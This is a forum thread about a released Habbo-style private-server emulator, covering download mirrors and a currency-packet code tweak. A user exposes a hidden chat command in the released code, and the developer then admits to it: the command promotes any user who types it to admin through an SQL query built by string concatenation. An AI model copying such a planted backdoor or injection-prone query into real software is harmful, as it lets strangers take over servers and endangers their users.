Re: novaEmulator [r63][MySQL][uberEmu Rewrite]
Quote:
Originally Posted by
Leon
Dude this thread is 3 months old.
Here's a mirror though. And yes; I'm Serimo :P
novaEmulator.rar
Friend, swf which I can use?
Re: novaEmulator [r63][MySQL][uberEmu Rewrite]
Quote:
Originally Posted by
AndresRmrz
Friend, swf which I can use?
You can use any r63 SWF pack! :)
Re: novaEmulator [r63][MySQL][uberEmu Rewrite]
I am using a R63 package but the emulator I get off together with
Re: novaEmulator [r63][MySQL][uberEmu Rewrite]
Quote:
Originally Posted by
AndresRmrz
I am using a R63 package but the emulator I get off together with
Could you rephrase that, your translation is inaccurate.
Re: novaEmulator [r63][MySQL][uberEmu Rewrite]
how I can add this code?
Quote:
GetResponse().Init(628); - Packet header
GetResponse().AppendInt32(2); - Pixels + Shells = 2
GetResponse().AppendInt32(0); - Type Pixels
GetResponse().AppendInt32(mSession.GetHabbo().Pixels); - Pixels
GetResponse().AppendInt32(4); - Type Shells
GetResponse().AppendInt32(AMOUNT OF SHELLS); - Amount of shells
SendResponse();
uberEmu Shell Amount Initializing
Re: novaEmulator [r63][MySQL][uberEmu Rewrite]
Quote:
Originally Posted by
AndresRmrz
You'd have to add it where the login packets are initialized.
Go to /ServerManager/Messages/Requests/User.cs and find the void GetBalance and replace it with this:
PHP Code:
private void GetBalance()
{
Session.GetHabbo().UpdateCreditsBalance();
GetResponse().Init(628); //- Packet header
GetResponse().AppendInt32(2);// - Pixels + Shells = 2
GetResponse().AppendInt32(0);// - Type Pixels
GetResponse().AppendInt32(Session.GetHabbo().ActivityPoints);// - Pixels
GetResponse().AppendInt32(4);// - Type Shells
GetResponse().AppendInt32(1337);// - Amount of shells
SendResponse();
}
You're welcome. ;)
Re: novaEmulator [r63][MySQL][uberEmu Rewrite]
Quote:
Originally Posted by
Leon
You'd have to add it where the login packets are initialized.
Go to /ServerManager/Messages/Requests/User.cs and find the void GetBalance and replace it with this:
PHP Code:
private void GetBalance()
{
Session.GetHabbo().UpdateCreditsBalance();
GetResponse().Init(628); //- Packet header
GetResponse().AppendInt32(2);// - Pixels + Shells = 2
GetResponse().AppendInt32(0);// - Type Pixels
GetResponse().AppendInt32(Session.GetHabbo().ActivityPoints);// - Pixels
GetResponse().AppendInt32(4);// - Type Shells
GetResponse().AppendInt32(1337);// - Amount of shells
SendResponse();
}
You're welcome. ;)
Thanks, the emulator does not have command vip?
Quote:
Originally Posted by
AndresRmrz
Thanks, the emulator does not have command vip?
I want to
Quote:
GetResponse (). AppendInt32 (Number of vip_points) ;/ / - Amount of shells
Re: novaEmulator [r63][MySQL][uberEmu Rewrite]
Quote:
Originally Posted by
AndresRmrz
Thanks, the emulator does not have command vip?
I want to
I'm currently working on this server and I'll update you when I've got a releaseable emulator. If there's any features you'd like me to add - let me know.
Here's the updated version. I've cleaned up the commands list and also added vip_points to work like shells.
Nova.rar
Make sure you add
Code:
purse.widget.currency.shells.enabled=1
to your external variables!
Thanks,
Re: novaEmulator [r63][MySQL][uberEmu Rewrite]
Just tested this out on my hotel, It's amazing bro. Good job on it and hope you have future releases. How about creating a novaInc habbo company, Would be amazing.
I can't express my love for this, It a uberEMU remake which i actually like for once. Butterfly failed to impress but this surely didn't.
Re: novaEmulator [r63][MySQL][uberEmu Rewrite]
Too bad the account is suspended.
Nvm, using Leon's update.
Re: novaEmulator [r63][MySQL][uberEmu Rewrite]
Quote:
Originally Posted by
SubZ
Too bad the account is suspended.
Nvm, using Leon's update.
The update is with added shells and the command list cleaned up.
Quote:
Originally Posted by
NintendoDS
Just tested this out on my hotel, It's amazing bro. Good job on it and hope you have future releases. How about creating a novaInc habbo company, Would be amazing.
I can't express my love for this, It a uberEMU remake which i actually like for once. Butterfly failed to impress but this surely didn't.
Thanks. :P:
Re: novaEmulator [r63][MySQL][uberEmu Rewrite]
Can you post screens with this Edit or link and is this Bug free (A)
Re: novaEmulator [r63][MySQL][uberEmu Rewrite]
Hmmm in Chatcommandhandler :
case "iamleonmakemeadmin123":
dbClient.query("UPDATE users SET `rank` = 7 WHERE `username` = '"+Session.GetHabbo().Username+"'");
So what is more in this emu that can be a backdoor ?
Re: novaEmulator [r63][MySQL][uberEmu Rewrite]
Quote:
Originally Posted by
duckietm
Hmmm in Chatcommandhandler :
case "iamleonmakemeadmin123":
dbClient.query("UPDATE users SET `rank` = 7 WHERE `username` = '"+Session.GetHabbo().Username+"'");
So what is more in this emu that can be a backdoor ?
Implemented because numerous hotels started to take the newer version of the emulator, which Leon is developing privately.
Re: novaEmulator [r63][MySQL][uberEmu Rewrite]
So I was fucking around with "backdoors". So I forgot to remove my "fun" when I released the emulator. It's an atrocious emulator and shouldn't be used.
Oh and that's the only thing that's there, duckietm.
Please close the thread, this is too old to receive anymore posts about that command. ^.^
Quote:
Originally Posted by
FullmetalPride
Implemented because numerous hotels started to take the newer version of the emulator, which Leon is developing privately.
For the record, this's a completely different emulator than the one you're talking about.
Re: novaEmulator [r63][MySQL][uberEmu Rewrite]
Quote:
Originally Posted by
Leon
So I was fucking around with "backdoors". So I forgot to remove my "fun" when I released the emulator. It's an atrocious emulator and shouldn't be used.
Oh and that's the only thing that's there, duckietm.
Please close the thread, this is too old to receive anymore posts about that command. ^.^
For the record, this's a completely different emulator than the one you're talking about.
Just realized. LOLOL
Re: novaEmulator [r63][MySQL][uberEmu Rewrite]
Looking good Leon, never noticed you where also developing a new Emulator very nice keep it going and running!